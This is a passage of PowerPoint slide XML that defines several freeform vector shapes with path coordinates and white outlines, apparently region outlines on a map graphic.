                      <a:pt x="9" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36131" name="Freeform 264"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2915" y="1869"/>
                <a:ext cx="22" cy="28"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 22"/>
                  <a:gd name="T1" fmla="*/ 28 h 28"/>
                  <a:gd name="T2" fmla="*/ 13 w 22"/>
                  <a:gd name="T3" fmla="*/ 27 h 28"/>
                  <a:gd name="T4" fmla="*/ 11 w 22"/>
                  <a:gd name="T5" fmla="*/ 22 h 28"/>
                  <a:gd name="T6" fmla="*/ 8 w 22"/>
                  <a:gd name="T7" fmla="*/ 23 h 28"/>
                  <a:gd name="T8" fmla="*/ 3 w 22"/>
                  <a:gd name="T9" fmla="*/ 22 h 28"/>
                  <a:gd name="T10" fmla="*/ 2 w 22"/>
                  <a:gd name="T11" fmla="*/ 18 h 28"/>
                  <a:gd name="T12" fmla="*/ 0 w 22"/>
                  <a:gd name="T13" fmla="*/ 9 h 28"/>
                  <a:gd name="T14" fmla="*/ 3 w 22"/>
                  <a:gd name="T15" fmla="*/ 8 h 28"/>
                  <a:gd name="T16" fmla="*/ 8 w 22"/>
                  <a:gd name="T17" fmla="*/ 2 h 28"/>
                  <a:gd name="T18" fmla="*/ 10 w 22"/>
                  <a:gd name="T19" fmla="*/ 9 h 28"/>
                  <a:gd name="T20" fmla="*/ 14 w 22"/>
                  <a:gd name="T21" fmla="*/ 11 h 28"/>
                  <a:gd name="T22" fmla="*/ 15 w 22"/>
                  <a:gd name="T23" fmla="*/ 8 h 28"/>
                  <a:gd name="T24" fmla="*/ 16 w 22"/>
                  <a:gd name="T25" fmla="*/ 0 h 28"/>
                  <a:gd name="T26" fmla="*/ 18 w 22"/>
                  <a:gd name="T27" fmla="*/ 0 h 28"/>
                  <a:gd name="T28" fmla="*/ 22 w 22"/>
                  <a:gd name="T29" fmla="*/ 0 h 28"/>
                  <a:gd name="T30" fmla="*/ 22 w 22"/>
                  <a:gd name="T31" fmla="*/ 7 h 28"/>
                  <a:gd name="T32" fmla="*/ 21 w 22"/>
                  <a:gd name="T33" fmla="*/ 12 h 28"/>
                  <a:gd name="T34" fmla="*/ 20 w 22"/>
                  <a:gd name="T35" fmla="*/ 13 h 28"/>
                  <a:gd name="T36" fmla="*/ 17 w 22"/>
                  <a:gd name="T37" fmla="*/ 17 h 28"/>
                  <a:gd name="T38" fmla="*/ 21 w 22"/>
                  <a:gd name="T39" fmla="*/ 20 h 28"/>
                  <a:gd name="T40" fmla="*/ 19 w 22"/>
                  <a:gd name="T41" fmla="*/ 22 h 28"/>
                  <a:gd name="T42" fmla="*/ 16 w 22"/>
                  <a:gd name="T43" fmla="*/ 27 h 28"/>
                  <a:gd name="T44" fmla="*/ 14 w 22"/>
                  <a:gd name="T45" fmla="*/ 28 h 28"/>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22"/>
                  <a:gd name="T70" fmla="*/ 0 h 28"/>
                  <a:gd name="T71" fmla="*/ 22 w 22"/>
                  <a:gd name="T72" fmla="*/ 28 h 28"/>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22" h="28">
                    <a:moveTo>
                      <a:pt x="14" y="28"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="28"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36132" name="Freeform 265"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2866" y="1843"/>
                <a:ext cx="46" cy="56"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 46"/>
                  <a:gd name="T1" fmla="*/ 55 h 56"/>
                  <a:gd name="T2" fmla="*/ 10 w 46"/>
                  <a:gd name="T3" fmla="*/ 56 h 56"/>
                  <a:gd name="T4" fmla="*/ 10 w 46"/>
                  <a:gd name="T5" fmla="*/ 56 h 56"/>
                  <a:gd name="T6" fmla="*/ 10 w 46"/>
                  <a:gd name="T7" fmla="*/ 51 h 56"/>
                  <a:gd name="T8" fmla="*/ 9 w 46"/>
                  <a:gd name="T9" fmla="*/ 43 h 56"/>
                  <a:gd name="T10" fmla="*/ 8 w 46"/>
                  <a:gd name="T11" fmla="*/ 43 h 56"/>
                  <a:gd name="T12" fmla="*/ 5 w 46"/>
                  <a:gd name="T13" fmla="*/ 40 h 56"/>
                  <a:gd name="T14" fmla="*/ 3 w 46"/>
                  <a:gd name="T15" fmla="*/ 42 h 56"/>
                  <a:gd name="T16" fmla="*/ 0 w 46"/>
                  <a:gd name="T17" fmla="*/ 40 h 56"/>
                  <a:gd name="T18" fmla="*/ 2 w 46"/>
                  <a:gd name="T19" fmla="*/ 35 h 56"/>
                  <a:gd name="T20" fmla="*/ 5 w 46"/>
                  <a:gd name="T21" fmla="*/ 32 h 56"/>
                  <a:gd name="T22" fmla="*/ 5 w 46"/>
                  <a:gd name="T23" fmla="*/ 29 h 56"/>
                  <a:gd name="T24" fmla="*/ 2 w 46"/>
                  <a:gd name="T25" fmla="*/ 23 h 56"/>
                  <a:gd name="T26" fmla="*/ 2 w 46"/>
                  <a:gd name="T27" fmla="*/ 19 h 56"/>
                  <a:gd name="T28" fmla="*/ 3 w 46"/>
                  <a:gd name="T29" fmla="*/ 13 h 56"/>
                  <a:gd name="T30" fmla="*/ 5 w 46"/>
                  <a:gd name="T31" fmla="*/ 11 h 56"/>
                  <a:gd name="T32" fmla="*/ 7 w 46"/>
                  <a:gd name="T33" fmla="*/ 13 h 56"/>
                  <a:gd name="T34" fmla="*/ 11 w 46"/>
                  <a:gd name="T35" fmla="*/ 15 h 56"/>
                  <a:gd name="T36" fmla="*/ 14 w 46"/>
                  <a:gd name="T37" fmla="*/ 8 h 56"/>
                  <a:gd name="T38" fmla="*/ 16 w 46"/>
                  <a:gd name="T39" fmla="*/ 6 h 56"/>
                  <a:gd name="T40" fmla="*/ 18 w 46"/>
                  <a:gd name="T41" fmla="*/ 12 h 56"/>
                  <a:gd name="T42" fmla="*/ 21 w 46"/>
                  <a:gd name="T43" fmla="*/ 11 h 56"/>
                  <a:gd name="T44" fmla="*/ 21 w 46"/>
                  <a:gd name="T45" fmla="*/ 5 h 56"/>
                  <a:gd name="T46" fmla="*/ 22 w 46"/>
                  <a:gd name="T47" fmla="*/ 0 h 56"/>
                  <a:gd name="T48" fmla="*/ 29 w 46"/>
                  <a:gd name="T49" fmla="*/ 0 h 56"/>
                  <a:gd name="T50" fmla="*/ 35 w 46"/>
                  <a:gd name="T51" fmla="*/ 1 h 56"/>
                  <a:gd name="T52" fmla="*/ 35 w 46"/>
                  <a:gd name="T53" fmla="*/ 8 h 56"/>
                  <a:gd name="T54" fmla="*/ 37 w 46"/>
                  <a:gd name="T55" fmla="*/ 12 h 56"/>
                  <a:gd name="T56" fmla="*/ 45 w 46"/>
                  <a:gd name="T57" fmla="*/ 13 h 56"/>
                  <a:gd name="T58" fmla="*/ 46 w 46"/>
                  <a:gd name="T59" fmla="*/ 15 h 56"/>
                  <a:gd name="T60" fmla="*/ 44 w 46"/>
                  <a:gd name="T61" fmla="*/ 22 h 56"/>
                  <a:gd name="T62" fmla="*/ 39 w 46"/>
                  <a:gd name="T63" fmla="*/ 24 h 56"/>
                  <a:gd name="T64" fmla="*/ 39 w 46"/>
                  <a:gd name="T65" fmla="*/ 21 h 56"/>
                  <a:gd name="T66" fmla="*/ 36 w 46"/>
                  <a:gd name="T67" fmla="*/ 21 h 56"/>
                  <a:gd name="T68" fmla="*/ 34 w 46"/>
                  <a:gd name="T69" fmla="*/ 23 h 56"/>
                  <a:gd name="T70" fmla="*/ 35 w 46"/>
                  <a:gd name="T71" fmla="*/ 27 h 56"/>
                  <a:gd name="T72" fmla="*/ 34 w 46"/>
                  <a:gd name="T73" fmla="*/ 32 h 56"/>
                  <a:gd name="T74" fmla="*/ 32 w 46"/>
                  <a:gd name="T75" fmla="*/ 33 h 56"/>
                  <a:gd name="T76" fmla="*/ 31 w 46"/>
                  <a:gd name="T77" fmla="*/ 36 h 56"/>
                  <a:gd name="T78" fmla="*/ 27 w 46"/>
                  <a:gd name="T79" fmla="*/ 36 h 56"/>
                  <a:gd name="T80" fmla="*/ 28 w 46"/>
                  <a:gd name="T81" fmla="*/ 39 h 56"/>
                  <a:gd name="T82" fmla="*/ 26 w 46"/>
                  <a:gd name="T83" fmla="*/ 40 h 56"/>
                  <a:gd name="T84" fmla="*/ 24 w 46"/>
                  <a:gd name="T85" fmla="*/ 43 h 56"/>
                  <a:gd name="T86" fmla="*/ 24 w 46"/>
                  <a:gd name="T87" fmla="*/ 47 h 56"/>
                  <a:gd name="T88" fmla="*/ 24 w 46"/>
                  <a:gd name="T89" fmla="*/ 50 h 56"/>
                  <a:gd name="T90" fmla="*/ 22 w 46"/>
                  <a:gd name="T91" fmla="*/ 54 h 56"/>
                  <a:gd name="T92" fmla="*/ 24 w 46"/>
                  <a:gd name="T93" fmla="*/ 55 h 5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46"/>
                  <a:gd name="T142" fmla="*/ 0 h 56"/>
                  <a:gd name="T143" fmla="*/ 46 w 46"/>
                  <a:gd name="T144" fmla="*/ 56 h 5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46" h="56">
                    <a:moveTo>
                      <a:pt x="24" y="55"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="55"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36133" name="Freeform 266"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2592" y="2172"/>
                <a:ext cx="197" cy="160"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 197"/>
                  <a:gd name="T1" fmla="*/ 33 h 160"/>
                  <a:gd name="T2" fmla="*/ 5 w 197"/>
                  <a:gd name="T3" fmla="*/ 20 h 160"/>
                  <a:gd name="T4" fmla="*/ 0 w 197"/>
                  <a:gd name="T5" fmla="*/ 15 h 160"/>
                  <a:gd name="T6" fmla="*/ 7 w 197"/>
                  <a:gd name="T7" fmla="*/ 9 h 160"/>
                  <a:gd name="T8" fmla="*/ 16 w 197"/>
                  <a:gd name="T9" fmla="*/ 6 h 160"/>
                  <a:gd name="T10" fmla="*/ 26 w 197"/>
                  <a:gd name="T11" fmla="*/ 0 h 160"/>
                  <a:gd name="T12" fmla="*/ 44 w 197"/>
                  <a:gd name="T13" fmla="*/ 4 h 160"/>
                  <a:gd name="T14" fmla="*/ 55 w 197"/>
                  <a:gd name="T15" fmla="*/ 0 h 160"/>
                  <a:gd name="T16" fmla="*/ 71 w 197"/>
                  <a:gd name="T17" fmla="*/ 6 h 160"/>
                  <a:gd name="T18" fmla="*/ 93 w 197"/>
                  <a:gd name="T19" fmla="*/ 8 h 160"/>
                  <a:gd name="T20" fmla="*/ 103 w 197"/>
                  <a:gd name="T21" fmla="*/ 4 h 160"/>
                  <a:gd name="T22" fmla="*/ 117 w 197"/>
                  <a:gd name="T23" fmla="*/ 9 h 160"/>
                  <a:gd name="T24" fmla="*/ 124 w 197"/>
                  <a:gd name="T25" fmla="*/ 12 h 160"/>
                  <a:gd name="T26" fmla="*/ 124 w 197"/>
                  <a:gd name="T27" fmla="*/ 16 h 160"/>
                  <a:gd name="T28" fmla="*/ 134 w 197"/>
                  <a:gd name="T29" fmla="*/ 18 h 160"/>
                  <a:gd name="T30" fmla="*/ 139 w 197"/>
                  <a:gd name="T31" fmla="*/ 21 h 160"/>
                  <a:gd name="T32" fmla="*/ 144 w 197"/>
                  <a:gd name="T33" fmla="*/ 22 h 160"/>
                  <a:gd name="T34" fmla="*/ 150 w 197"/>
                  <a:gd name="T35" fmla="*/ 24 h 160"/>
                  <a:gd name="T36" fmla="*/ 156 w 197"/>
                  <a:gd name="T37" fmla="*/ 21 h 160"/>
                  <a:gd name="T38" fmla="*/ 169 w 197"/>
                  <a:gd name="T39" fmla="*/ 26 h 160"/>
                  <a:gd name="T40" fmla="*/ 173 w 197"/>
                  <a:gd name="T41" fmla="*/ 29 h 160"/>
                  <a:gd name="T42" fmla="*/ 177 w 197"/>
                  <a:gd name="T43" fmla="*/ 31 h 160"/>
                  <a:gd name="T44" fmla="*/ 185 w 197"/>
                  <a:gd name="T45" fmla="*/ 31 h 160"/>
                  <a:gd name="T46" fmla="*/ 194 w 197"/>
                  <a:gd name="T47" fmla="*/ 29 h 160"/>
                  <a:gd name="T48" fmla="*/ 196 w 197"/>
                  <a:gd name="T49" fmla="*/ 35 h 160"/>
                  <a:gd name="T50" fmla="*/ 189 w 197"/>
                  <a:gd name="T51" fmla="*/ 45 h 160"/>
                  <a:gd name="T52" fmla="*/ 173 w 197"/>
                  <a:gd name="T53" fmla="*/ 54 h 160"/>
                  <a:gd name="T54" fmla="*/ 159 w 197"/>
                  <a:gd name="T55" fmla="*/ 61 h 160"/>
                  <a:gd name="T56" fmla="*/ 160 w 197"/>
                  <a:gd name="T57" fmla="*/ 66 h 160"/>
                  <a:gd name="T58" fmla="*/ 144 w 197"/>
                  <a:gd name="T59" fmla="*/ 82 h 160"/>
                  <a:gd name="T60" fmla="*/ 141 w 197"/>
                  <a:gd name="T61" fmla="*/ 91 h 160"/>
                  <a:gd name="T62" fmla="*/ 144 w 197"/>
                  <a:gd name="T63" fmla="*/ 101 h 160"/>
                  <a:gd name="T64" fmla="*/ 145 w 197"/>
                  <a:gd name="T65" fmla="*/ 108 h 160"/>
                  <a:gd name="T66" fmla="*/ 138 w 197"/>
                  <a:gd name="T67" fmla="*/ 116 h 160"/>
                  <a:gd name="T68" fmla="*/ 134 w 197"/>
                  <a:gd name="T69" fmla="*/ 128 h 160"/>
                  <a:gd name="T70" fmla="*/ 121 w 197"/>
                  <a:gd name="T71" fmla="*/ 131 h 160"/>
                  <a:gd name="T72" fmla="*/ 111 w 197"/>
                  <a:gd name="T73" fmla="*/ 145 h 160"/>
                  <a:gd name="T74" fmla="*/ 103 w 197"/>
                  <a:gd name="T75" fmla="*/ 146 h 160"/>
                  <a:gd name="T76" fmla="*/ 76 w 197"/>
                  <a:gd name="T77" fmla="*/ 146 h 160"/>
                  <a:gd name="T78" fmla="*/ 62 w 197"/>
                  <a:gd name="T79" fmla="*/ 155 h 160"/>
                  <a:gd name="T80" fmla="*/ 60 w 197"/>
                  <a:gd name="T81" fmla="*/ 156 h 160"/>
                  <a:gd name="T82" fmla="*/ 57 w 197"/>
                  <a:gd name="T83" fmla="*/ 160 h 160"/>
                  <a:gd name="T84" fmla="*/ 47 w 197"/>
                  <a:gd name="T85" fmla="*/ 151 h 160"/>
                  <a:gd name="T86" fmla="*/ 44 w 197"/>
                  <a:gd name="T87" fmla="*/ 146 h 160"/>
                  <a:gd name="T88" fmla="*/ 37 w 197"/>
                  <a:gd name="T89" fmla="*/ 137 h 160"/>
                  <a:gd name="T90" fmla="*/ 28 w 197"/>
                  <a:gd name="T91" fmla="*/ 136 h 160"/>
                  <a:gd name="T92" fmla="*/ 32 w 197"/>
                  <a:gd name="T93" fmla="*/ 124 h 160"/>
                  <a:gd name="T94" fmla="*/ 30 w 197"/>
                  <a:gd name="T95" fmla="*/ 114 h 160"/>
                  <a:gd name="T96" fmla="*/ 37 w 197"/>
                  <a:gd name="T97" fmla="*/ 101 h 160"/>
                  <a:gd name="T98" fmla="*/ 29 w 197"/>
                  <a:gd name="T99" fmla="*/ 89 h 160"/>
                  <a:gd name="T100" fmla="*/ 38 w 197"/>
                  <a:gd name="T101" fmla="*/ 85 h 160"/>
                  <a:gd name="T102" fmla="*/ 39 w 197"/>
                  <a:gd name="T103" fmla="*/ 66 h 160"/>
                  <a:gd name="T104" fmla="*/ 39 w 197"/>
                  <a:gd name="T105" fmla="*/ 57 h 160"/>
                  <a:gd name="T106" fmla="*/ 50 w 197"/>
                  <a:gd name="T107" fmla="*/ 47 h 160"/>
                  <a:gd name="T108" fmla="*/ 41 w 197"/>
                  <a:gd name="T109" fmla="*/ 38 h 160"/>
                  <a:gd name="T110" fmla="*/ 21 w 197"/>
                  <a:gd name="T111" fmla="*/ 40 h 160"/>
                  <a:gd name="T112" fmla="*/ 7 w 197"/>
                  <a:gd name="T113" fmla="*/ 40 h 160"/>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97"/>
                  <a:gd name="T172" fmla="*/ 0 h 160"/>
                  <a:gd name="T173" fmla="*/ 197 w 197"/>
                  <a:gd name="T174" fmla="*/ 160 h 160"/>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97" h="160">
                    <a:moveTo>
                      <a:pt x="7" y="40"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
